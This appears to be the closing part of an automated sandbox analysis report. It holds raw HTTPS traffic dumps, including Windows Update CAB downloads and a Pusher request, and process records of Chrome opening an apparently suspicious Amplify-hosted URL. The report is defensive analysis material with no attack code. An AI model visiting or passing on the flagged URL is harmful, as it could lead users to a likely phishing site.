                                          2024-03-25 19:07:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                          2024-03-25 19:07:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.64974852.165.165.26443
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:08:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Bx8gPCgPUcp42UL&MD=5RhX4v+r HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                          Host: slscr.update.microsoft.com
                                          2024-03-25 19:08:06 UTC560INHTTP/1.1 200 OK
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          Content-Type: application/octet-stream
                                          Expires: -1
                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                          ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                          MS-CorrelationId: d8e6b9e7-61db-4c81-b0f7-9ffe95f91f7a
                                          MS-RequestId: f46ae49c-6567-4376-8b9a-d0265d8ea7d0
                                          MS-CV: wwjX5NEV9UK0Mbix.0
                                          X-Microsoft-SLSClientCache: 2160
                                          Content-Disposition: attachment; filename=environment.cab
                                          X-Content-Type-Options: nosniff
                                          Date: Mon, 25 Mar 2024 19:08:05 GMT
                                          Connection: close
                                          Content-Length: 25457
                                          2024-03-25 19:08:06 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                          Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                          2024-03-25 19:08:06 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                          Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.64975199.81.234.04435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:08:17 UTC457OUTGET /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1711393641468&n=1 HTTP/1.1
                                          Host: sockjs-eu.pusher.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:08:17 UTC209INHTTP/1.1 405 Method Not Allowed
                                          allow: POST, OPTIONS
                                          date: Mon, 25 Mar 2024 19:08:17 GMT
                                          keep-alive: timeout=5
                                          transfer-encoding: chunked
                                          strict-transport-security: max-age=15768000
                                          connection: close
                                          2024-03-25 19:08:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Click to jump to process

                                          Click to jump to process

                                          Click to jump to process

                                          Target ID:0
                                          Start time:20:07:07
                                          Start date:25/03/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                          Imagebase:0x7ff684c40000
                                          File size:3'242'272 bytes
                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:2
                                          Start time:20:07:10
                                          Start date:25/03/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1904,i,7492219520878675304,2440813049472700085,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                          Imagebase:0x7ff684c40000
                                          File size:3'242'272 bytes
                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:20:07:14
                                          Start date:25/03/2024
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/"
                                          Imagebase:0x7ff684c40000
                                          File size:3'242'272 bytes
                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          No disassembly